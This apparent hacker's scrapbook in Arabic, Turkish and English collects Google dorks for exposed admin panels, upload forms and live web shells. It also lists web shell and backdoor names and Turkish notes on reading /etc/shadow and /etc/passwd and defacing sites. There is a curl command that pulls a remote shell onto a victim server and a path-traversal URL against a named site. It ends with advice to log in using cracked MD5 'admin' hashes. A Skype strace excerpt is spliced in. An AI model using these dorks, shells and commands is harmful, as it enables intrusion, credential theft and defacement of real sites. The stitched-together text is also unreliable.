intext:"SteamAppUser=" -"username" -"user" inurl:admin filetype:asp inurl:userlist inurl:admin inurl:userlist inurlhp inurl:hlstats intext:"Server Username" OWA Public folders & Address book sh_history files Footholds _________ "adding new user" inurl:addnewuser -"there are no domains" "index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl ) "Please re-enter your password It must match exactly" (intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status") (intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=") (inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ") +htpasswd +WS_FTP.LOG filetype:log filetypehp HAXPLORER "Server Files Browser" intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:" intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login intitle:"Web Data Administrator - Login" intitle:"YALA: Yet Another LDAP Administrator" intitle:admin intitle:login intitle:MyShell 1.1.0 build 20010923 inurl:"phpOracleAdmin/php" -download -cvs inurl:"tmtrack.dll?" inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx inurlolly/CP PHP Shell (unprotected) PHPKonsole PHPShell filetypehp -echo Public PHP FileManagers Pages Containing Login Portals ______________________________ intitle:"remote assessment" OpenAanval Console intitlepengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password" "bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com "Emergisoft web applications are a part of our" "Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights- "HostingAccelerator" intitle:"login" +"Username" -"news" -demo "iCONECT 4.1 :: Login" "IMail Server Web Messaging" intitle:login "inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com "intitle:3300 Integrated Communications Platform" inurl:main.htm "Login - Sun Cobalt RaQ" "login prompt" inurl:GM.cgi "Login to Usermin" inurl:20000 "Microsoft CRM : Unsupported Browser Version" "OPENSRS Domain Management" inurl:manage.cgi "pcANYWHERE EXPRESS Java Client" "Please authenticate yourself to get access to the management interface" "please log in" "Please login with admin pass" -"leak" -sourceforge "powered by CuteNews" "2003..2005 CutePHP" "Powered by DWMail" password intitle:dwmail "Powered by Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com "Powered by Midmart Messageboard" "Administrator Login" "Powered by Monster Top List" MTL numrange:200- "Powered by UebiMiau" -site:sourceforge.net "site info for" "Enter Admin Password" "SquirrelMail version" "By the SquirrelMail Development Team" "SysCP - login" "This is a restricted Access Server" "Java****** Not Enabled!"|"Messenger Express" -edu -ac "This section is for Administrators only. If you are an administrator then please" "ttawlogin.cgi/?action=" "VHCS Pro ver" -demo "VNC Desktop" inurl:5800 "Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com "WebExplorer Server - Login" "Welcome to WebExplorer Server" "WebSTAR Mail - Please Log In" "You have requested access to a restricted area of our website. Please authenticate yourself to continue." "You have requested to access the management functions" -.edu (intitle:"Please login - Forums powered by UBB.threads")|(inurl:login.php "ubb") (intitle:"Please login - Forums powered by WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl :"wwwthreads/login.pl?Cat=") (intitle:"rymo Login")|(intext:"Welcome to rymo") -family (intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration") (inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil 4images Administration Control Panel allintitle:"Welcome to the Cyclades" allinurl:"exchange/logon.asp" allinurl:wps/portal/ login ASP.login_aspx "ASP.NET_SessionId" CGI:IRC Login ext:cgi intitle:"control panel" "enter your owner password to continue!" ez Publish administration filetypehp inurl:"webeditor.php" filetypel "Download: SuSE Linux Openexchange Server CA" filetype:r2w r2w intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board" intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu intext:"Mail admins login here to administrate your domain." intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin intext:"Storage Management Server for" intitle:"Server Administration" intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee intext:"vbulletin" inurl:admincp intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press intitle:"Admin Login" "admin login" "blogware" intitle:"Admin login" "Web Site Administration" "Copyright" intitle:"AlternC Desktop" intitle:"Athens Authentication Point" intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept ******s in order to log in" -demo -site:b2evolution.net intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co intitle:"ColdFusion Administrator Login" intitle:"communigate pro * *" intitle:"entrance" intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo intitle:"Dell Remote Access Controller" intitle:"Docutek ERes - Admin Login" -edu intitle:"Employee Intranet Login" intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here." intitle:"ePowerSwitch Login" intitle:"eXist Database Administration" -demo intitle:"EXTRANET * - Identification" intitle:"EXTRANET login" -.edu -.mil -.gov intitle:"EZPartner" -netpond intitle:"Flash Operator Panel" -exthp -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists intitle:"i-secure v1.1" -edu intitle:"Icecast Administration Admin Page" intitle:"iDevAffiliate - admin" -demo intitle:"ISPMan : Unauthorized Access prohibited" intitle:"ITS System Information" "Please log on to the SAP System" intitle:"Kurant Corporation StoreSense" filetype:bok intitle:"ListMail Login" admin -demo intitle:"Login - powered by Easy File Sharing Web Server" intitle:"Login Forum Powered By AnyBoard" intitle:"If you are a new user:" intext:"Forum Powered By AnyBoard" inurl:gochat -edu intitle:"Login to @Mail" (extl | inurl:"index") -dwaffleman intitle:"Login to Cacti" intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id= intitle:"MailMan Login" intitle:"Member Login" "NOTE: Your browser must have ******s enabled in order to log into the site." exthp OR ext:cgi intitle:"Merak Mail Server Web Administration" -ihackstuff.com intitle:"microsoft certificate services" inurl:certsrv intitle:"MikroTik RouterOS Managing Webpage" intitle:"MX Control Console" "If you can't remember" intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetypedf intitle:"Novell Web Services" intext:"Select a service and a language." intitle:"oMail-admin Administration - Login" -inurlmnis.ch intitle:"OnLine Recruitment Program - Login" intitle:"Philex 0.2*" -****** -site:freelists.org intitle:"PHP Advanced Transfer" inurl:"login.php" intitle:"php icalendar administration" -site:sourceforge.net intitle:"php icalendar administration" -site:sourceforge.net intitle:"phpPgAdmin - Login" Language intitle:"PHProjekt - login" login password intitle:"please login" "your password is *" intitle:"Remote Desktop Web Connection" inurl:tsweb intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test" intitle:"SHOUTcast Administrator" inurl:admin.cgi intitle:"site administration: please log in" "site designed by emarketsouth" intitle:"Supero Doctor III" -inurl:supermicro intitle:"SuSE Linux Openexchange Server" "Please activate Java******!" intitle:"teamspeak server-administration intitle:"Tomcat Server Administration" intitle:"TOPdesk ApplicationServer" intitle:"TUTOS Login" intitle:"TWIG Login" intitle:"vhost" intext:"vHost . 2000-2004" intitle:"Virtual Server Administration System" intitle:"VisNetic WebMail" inurl:"/mail/" intitle:"VitalQIP IP Management System" intitle:"VMware Management Interface:" inurl:"vmware/en/" intitle:"VNC viewer for Java" intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org intitle:"WebLogic Server" intitle:"Console Login" inurl:console intitle:"Welcome Site/User Administrator" "Please select the language" -demos intitle:"Welcome to Mailtraq WebMail" intitle:"welcome to netware *" -site:novell.com intitle:"WorldClient" intext:"© (2003|2004) Alt-N Technologies." intitle:"xams 0.0.0..15 - Login" intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin intitle:"XMail Web Administration Interface" intext:Login intextassword intitle:"Zope Help System" inurl:HelpSys intitle:"ZyXEL Prestige Router" "Enter password" intitle:"inc. vpn 3000 concentrator" intitle"TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com intitle:asterisk.management.portal web-access intitle:endymion.saké.mail.login.page | inurl:sake.servlet intitle:Group-Office "Enter your username and password to login" intitle:ilohamail "Powered by IlohaMail" intitle:ilohamail intext:"Version 0.8.10" "Powered by IlohaMail" intitle:IMP inurl:imp/index.php3 intitle:Login * Webmailer intitle:Login intext:"RT is © Copyright" intitle:Node.List Win32.Version.3.11 intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc" intitlepen-xchange inurl:login.pl intitle:Ovislink inurlrivate/login intitlehpnews.login intitlelesk inurl:login.php3 inurl:"/admin/configuration. php?" Mystore inurl:"/slxweb.dll/external?name=(custportal|webti cketcust)" inurl:"1220/parse_xml.cgi?" inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS) inurl:":10000" intext:webmin inurl:"Activex/default.htm" "Demo" inurl:"calendar.asp?action=login" inurl:"default/login.php" intitle:"kerio" inurl:"gs/adminlogin.aspx" inurl:"php121login.php" inurl:"suse/login.pl" inurl:"typo3/index.php?u=" -demo inurl:"usysinfo?login=true" inurl:"utilities/TreeView.asp" inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp -"Response.Buffer = True" -java****** inurl:"webadmin" filetype:nsf inurl:/admin/login.asp inurl:/cgi-bin/sqwebmail?noframes=1 inurl:/Citrix/Nfuse17/ inurl:/dana-na/auth/welcome.html inurl:/eprise/ inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net inurl:/modcp/ intext:Moderator+vBulletin inurl:/SUSAdmin intitle:"Microsoft Software Update Services" inurl:/webedit.* intext:WebEdit Professional -html inurl:1810 "Oracle Enterprise Manager" inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com inurl::2082/frontend -demo inurl:administrator "welcome to mambo" inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0 inurl:cgi-bin/ultimatebb.cgi?ubb=login inurl:Citrix/MetaFrame/default/default.aspx inurl:confixx inurl:login|anmeldung inurl:coranto.cgi intitle:Login (Authorized Users Only) inurl:csCreatePro.cgi inurl:default.asp intitle:"WebCommander" inurl:exchweb/bin/auth/owalogon.asp inurl:gnatsweb.pl inurl:ids5web inurl:irc filetype:cgi cgi:irc inurl:login filetype:swf swf inurl:login.asp inurl:login.cfm inurl:login.php "SquirrelMail version" inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:mewebmail inurl:names.nsf?opendatabase inurlcw_login_username inurlrasso.wwsso_app_admin.ls_login inurlostfixadmin intitle:"postfix admin" exthp inurl:search/admin.php inurl:textpattern/index.php inurl:WCP_USER inurl:webmail./index.pl "Interface" inurl:webvpn.html "login" "Please enter your" Login ("Powered by Jetbox One CMS ™" | "Powered by Jetstream © *") Novell NetWare intext:"netware management portal version" Outlook Web Access (a better way) PhotoPost PHP Upload PHPhotoalbum Statistics PHPhotoalbum Upload phpWebMail Please enter a valid password! inurlolladmin Powered by INDEXU Ultima Online loginservers W-Nailer Upload Area Pages Containing Network Data _____________________________ filetype:log intext:"ConnectionManager2" "apricot - admin" 00h "by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta" "Network Host Assessment Report" "Internet Scanner" "Output produced by SysWatch *" "Phorum Admin" "Database Connection" inurl:forum inurl:admin "Powered by phpOpenTracker" Statistics "powered | performed by Beyond Security's Automated Scanning" -kazaa -example "Shadow Security Scanner performed a vulnerability assessment" "SnortSnarf alert page" "The following report contains confidential information" vulnerability -search "The statistics were last updated" "Daily"-microsoft.com "this proxy is working fine!" "enter *" "URL***" * visit "This report lists" "identified by Internet Scanner" "Traffic Analysis for" "RMON Port * on unit *" "Version Info" "Boot Version" "Internet Settings" ((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph")) Analysis Console for Incident Databases ext:cfg radius.cfg ext:cgi intext:"nrg-" " This web page was created on " filetypedf "Assessment Report" nessus filetypehp inurl:ipinfo.php "Distributed Intrusion Detection System" filetypehp inurl:nqt intext:"Network Query Tool" filetype:vsd vsd network -samples -examples intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm intitle:"ADSL Configuration page" intitle:"Azureus : Java BitTorrent Client Tracker" intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies." intitle:"BNBT Tracker Info" intitle:"Microsoft Site Server Analysis" intitle:"Nessus Scan Report" "This file was generated by Nessus" intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics" intitle:"Retina Report" "CONFIDENTIAL INFORMATION" intitle:"start.managing.the.device" remote pbx acc intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers." intitle:"twiki" inurl:"TWikiUsers" inurl:"/catalog.nsf" intitle:catalog inurl:"install/install.php" inurl:"map.asp?" intitle:"WhatsUp Gold" inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc" inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo inurl:/adm-cfgedit.php inurl:/cgi-bin/finger? "In real life" inurl:/cgi-bin/finger? Enter (account|host|user|username) inurl:/counter/index.php intitle:"+PHPCounter 7.*" inurl:CrazyWWWBoard.cgi intext:"detailed debugging information" inurl:login.jsp.bak inurlvcgi/jovw inurlhpSysInfo/ "created by phpsysinfo" inurlortscan.php "from Port"|"Port Range" inurlroxy | inurl:wpad extac | ext:dat findproxyforurl inurl:statrep.nsf -gov inurl:status.cgi?host=all inurl:testcgi xitami inurl:webalizer filetypeng -.gov -.edu -.mil -opendarwin inurl:webutil.pl Looking Glass site:netcraft.com intitle:That.Site.Running Apache Sensitive Directories _____________________ "Directory Listing for" "Hosted by Xerver" "Index Of /network" "last modified" "index of cgi-bin" "index of" / picasa.ini "index of" inurl:recycler "Index of" rar r01 nfo Modified 2004 "intitle:Index.Of /" stats merchant cgi-* etc "Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" ) "Warning: Installation directory exists at" "Powered by Zen Cart" -demo "Web File Browser" "Use regular expression" "Welcome to phpMyAdmin" " Create new database" "Welcome to the directory listing of" "NetworkActiv-Web-Server" allintitle:"FirstClass Login" allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/" filetype:cfg ks intext:rootpw -sample -test -howto filetype:ini Desktop.ini intext:mydocs.dll filetype:torrent torrent Index of phpMyAdmin index.of.dcim index.of.password index.of.password intext:"d.aspx?id" || inurl:"d.aspx?id" intext:"Powered By: TotalIndex" intitle:"TotalIndex" intitle:"album permissions" "Users who can modify photos" "EVERYBODY" intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder intitle:"HFS /" +"HttpFileServer" intitle:"Index of *" inurl:"my shared folder" size modified intitle:"Index of /CFIDE/" administrator intitle:"Index of c:\Windows" intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org intitle:"index of" -inurl:htm -inurl:html mp3 intitle:"Index of" cfide intitle:"index of" intext:"content.ie5" intitle:"index of" inurl:ftp (pub | incoming) intitle:"index.of.personal" intitle:"pictures thumbnails" siteictures.sprintpcs.com intitle:"webadmin - /*" filetypehp directory filename permission intitle:index.of (inurl:fileadmin | intitle:fileadmin) intitle:index.of /AlbumArt_ intitle:index.of /maildir/new/ intitle:index.of abyss.conf intitle:index.of WEB-INF intitle:intranet inurl:intranet +intext:"human resources" intitle:upload inurl:upload intext:upload -forum -shop -support -w3c inurl:/pls/sample/admin_/help/ inurl:/tmp inurl:backup intitle:index.of inurl:admin inurl:explorer.cfm inurldirpath|This_Directory) inurl:install.pl intext:"Reading path paramaters" -edu inurl:j2ee/examples/jsp inurljspdemos log inurl:linklint filetype:txt -"checking" Look in my backup directories! Please? private protected secret secure winnt انتــــهى ============================================================================ root # vim:syntax=apparmor # Last Modified: Sat Aug 25 00:37:50 2007 #include /usr/bin/skype { #include /dev/snd/controlC0 rw, /dev/snd/pcmC0D0c rw, /dev/snd/pcmC0D0p rw, /dev/snd/pcmC0D1c rw, /dev/snd/timer r, /home/*/.Skype rw, /home/*/.Skype/** rw, /home/*/.config/Trolltech.conf r, /home/*/.fontconfig/* r, /home/*/.fonts/* r, /home/*/.Xauthority r, /home/*/.kde/share/config/kioslaverc r, /home/*/.ICEauthority r, /home/*/.mozilla r, /home/*/.mozilla/plugins r, /home/*/.mozilla/firefox r, /usr/bin/skype mr, /usr/share/alsa/** r, /usr/share/fonts/** r, /usr/share/icons/** r, /usr/share/locale-langpack/** r, /usr/share/skype/** r, /usr/share/X11/XKeysymDB r, /var/cache/fontconfig/* r, /var/lib/defoma/fontconfig.d/fonts.conf r, /tmp/** rw, /etc/fonts/** r, /etc/resolv.conf r, /etc/hosts r, /etc/nsswitch.conf r, /etc/gai.conf r, /etc/ passwd r, /etc/group r, /proc/1/cmdline r, /proc/interrupts r, ------------------------------------------------------------------------------------------------------------- New member Posts: 3 * I can confirm the same behavior in skype 1.4.0.94. Skype is trying to read /etc/ passwd as well. strace -v -i -s 9999 /usr/local/bin/skype 2> skype.log ... [0053e7a2] open("/etc/ passwd", O_RDONLY) = 12 [0053e7a2] fcntl64(12, F_GETFD) = 0 [0053e7a2] fcntl64(12, F_SETFD, FD_CLOEXEC) = 0 [0053e7a2] fstat64(12, {st_dev=makedev(3, 2), st_ino=132772, st_mode=S_IFREG|0644, st_nlink=1, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=1403, st_atime=2007/08/09-23:01:33, st_mtime=2007/07/17-13:17:21, st_ctime=2007/07/17-13:17:21}) = 0 [0053e7a2] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7341000 [0053e7a2] read(12, "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1: ..... all your content of passwd ... ============================================================================ CODE ls -ls CODE find ~ -exec cat {} \; CODE #include #include #include int main(int argc, char *argv[]) { struct passwd *toto = getpwuid(getuid()); printf("%s\n" toto->pw_name); return (0); CODE $ strace -v -i -s 9999 $( which skype ) >| skype-strace.log 2>&1 CODE $ strace -v -i -s 9999 $( which skype ) >| skype-strace.log 2>&1 $ strace -v -i -s 9999 $( which skype ) >| skype-strace.log 2>&1 CODE $ strace -v -f -i -s 9999 $( whence skype ) 2>&1 | egrep '\ [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 14 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 15 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/adblockplus", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 16 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/forecastfox", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 16 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/forecastfox/icons", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 17 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/forecastfox/errors", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 17 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 16 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{0538E3E3-7E9B-4d49-8831-A227C80A7AD3}", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 17 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{0538E3E3-7E9B-4d49-8831-A227C80A7AD3}/chrome", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{0538E3E3-7E9B-4d49-8831-A227C80A7AD3}/defaults", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{0538E3E3-7E9B-4d49-8831-A227C80A7AD3}/defaults/icons", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 19 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{0538E3E3-7E9B-4d49-8831-A227C80A7AD3}/defaults/preferences", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 19 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{0538E3E3-7E9B-4d49-8831-A227C80A7AD3}/defaults/transforms", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 19 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{0538E3E3-7E9B-4d49-8831-A227C80A7AD3}/components", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{4776510a-a1f4-41f3-a3c8-35b474ecef23}", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 17 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{4776510a-a1f4-41f3-a3c8-35b474ecef23}/chrome", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 17 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}/chrome", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}/defaults", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}/defaults/preferences", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 19 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}/components", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{73a6fe31-595d-460b-a920-fcc0f8843232}", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 17 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{73a6fe31-595d-460b-a920-fcc0f8843232}/chrome", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{73a6fe31-595d-460b-a920-fcc0f8843232}/defaults", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{73a6fe31-595d-460b-a920-fcc0f8843232}/defaults/preferences", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 19 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{73a6fe31-595d-460b-a920-fcc0f8843232}/components", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{9D23D0AA-D8F5-11DA-B3FC-0928ABF316DD}", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 17 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{9D23D0AA-D8F5-11DA-B3FC-0928ABF316DD}/chrome", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{9D23D0AA-D8F5-11DA-B3FC-0928ABF316DD}/defaults", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 18 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/extensions/{9D23D0AA-D8F5-11DA-B3FC-0928ABF316DD}/defaults/preferences", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 19 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/bookmarkbackups", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/searchplugins", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 16 [pid 5606] [b7f02410] open("/home/fool/.mozilla/firefox/default/prefs.js", O_RDONLY) = 13 CODE [pid 7285] [b7f7d410] open("/etc/nsswitch.conf", O_RDONLY CODE $ strace -v -i -s 9999 $( which skype ) >| skype-strace.log 2>&1 CODE [b7fd648d] close(8) = 0 [b7fd6cb1] munmap(0xb6f2c000, 65036) = 0 [ffffe410] open("/etc/ passwd", O_RDONLY) = 8 [ffffe410] fcntl64(8, F_GETFD) = 0 [ffffe410] fcntl64(8, F_SETFD, FD_CLOEXEC) = 0 ============================================================================ - C99madShell v. 2.0 madnet edition - c99-safe-mode - c99edit - c99shell - DownloaderToFTP - GFS Web-Shell ver 4.0.0.0 - NetworkFileManager - NiX Remote Web Shell™ - r57MySQL_FileViewer - r57shell - MySQLBackUpAll - MySQLBackUpOnce - Sql - a_gedit - Antichat - bk - c2007 - Casus15 - CmdAsp - Csh - Ctt_sh - Cybershell - DxShell - gfs_sh - grp-2018 - Hidshell - iMHaPFtp - Load_shell - NFM - NGH - Nixrem - NST - Phvayvv - Predator - r0t - Remview - Zacosmall - Rashell v.1.31 - Xoce 1.5 - Xoce 1.7 - img - mailer3 - myshell - mysql_tool - mysql - network - nshell - ru24_post_sh - pHpINJ - PHP Shell - Pws - KA_uShell - Sincap - telnet - telnetd - smtpd.py - xinfo - CyberSpy5.Asp - Indexer.asp - Klasvayv.asp - NTdaddy.asp - Reader.asp - RemExp.asp - Zehir4.asp - Ajan.asp - EFSO_2.asp - Elmali Seker.asp - Server Variables.asp - Tool.asp - WebShell.pl - PHP Backdoor Connect.pl - perlbot.pl - shellbot.pl - r57pws.pl - lurm_safemod_on.pl - Asmodeus v0.1.pl - connectback2.pl - Java Shell.js - Phyton Shell.py - cgi-python.py ======================= للبحث عن الروت etc/vdomainaliases/ var/named var/mail ======================= : r57.php download c99madshell.php c99mailarticleshell.php c99madshell.txt? 99.txt? 99? c99.php Safe-mode: OFF (not secure) inurl:c99.php uid=0(root) c99.php uid=0(root) c99.php drwxrwxrwx Random: admin.db print.php shell.php None passwd wp-trackback.php memory.log hackthissiteorg level 15 newtopic.php nquser.php ============================================================================ cat /etc/shadow - Sunucudaki Site Sifreleri Saklıdır %90 Perm Vardır cat /etc/passwd - Sunucudaki Kullanıcıları Listeler /var/named - Sunucudaki Siteleri Listeler /var/cpanel - Cpanel Loglarını Verir /var/mail - Sunucudaki Kullanıcıları Listeler /tmp - Linuxte yazma İzni En Cok Bulunan Klasor /etc/vdomainaliases - Hem Kullanıcıları Hemde Site Adreslerini Listeler echo Hacked By GHOST turkhackgrup.com >/home/sıte/public_html - Echo Komutu Sunucuda Hızlı Bir sekilde Bazı perm li Dosyalara Bile Uyarınızı Basmaya Yarar curl -o shell.php http://www.site.com/shell.txt - Bazı Sunucularda Klasorlere Normal Upload Yokken Bu Komutumuzla Shell İmizi cekebiliriz. ============================================================================ سيرفرات http://thepartsdude.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd http://extreme.aviel.ru/phpmyadmin/index.php http://phpmyadmin.ipipe.ru/index.php http://www.1991lobo.ru/mysql_admin/ http://4me.ru/4me/ http://xref.redalt.com/wptrunk/nav.htm?wp-admin/admin.php.htm ============================================================================ دورك جديد مهم http://yozurino.com/r.txt Index of /Member_Admin/logo مهمه uid=0(root) gid=0(root) uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1 (wheel) ============================================================================ inurl:c99.php index of ============================================================================ wwwgogl ============================================================================ دورك برايفت الشل c99.php Detected drives: [ a ] [ c ] [ d ] + shell+drwxrwxrwx+c99 + دورك للروت مهم vserver (date) c99.php + مهم powered_by.png ## Ekin0x Shell ## + مهم //system('id'); //readfile('/etc/passwd'); //passthru('pwd'); ============================================================================ فكرة البحث عن يوزر الادمن مشفر md5 والروت مشفر md5 What your going to do, is search MySQL dumps for encrypted MD5's of common passwords. For examaple: "21232f297a57a5a743894a0e4a801fc3" is md5 result for "admin" So if someones password row has that row, you can take a quick peek at their username, and log in Username: Whatever You Found Password: admin I'll also include some other common MD5's 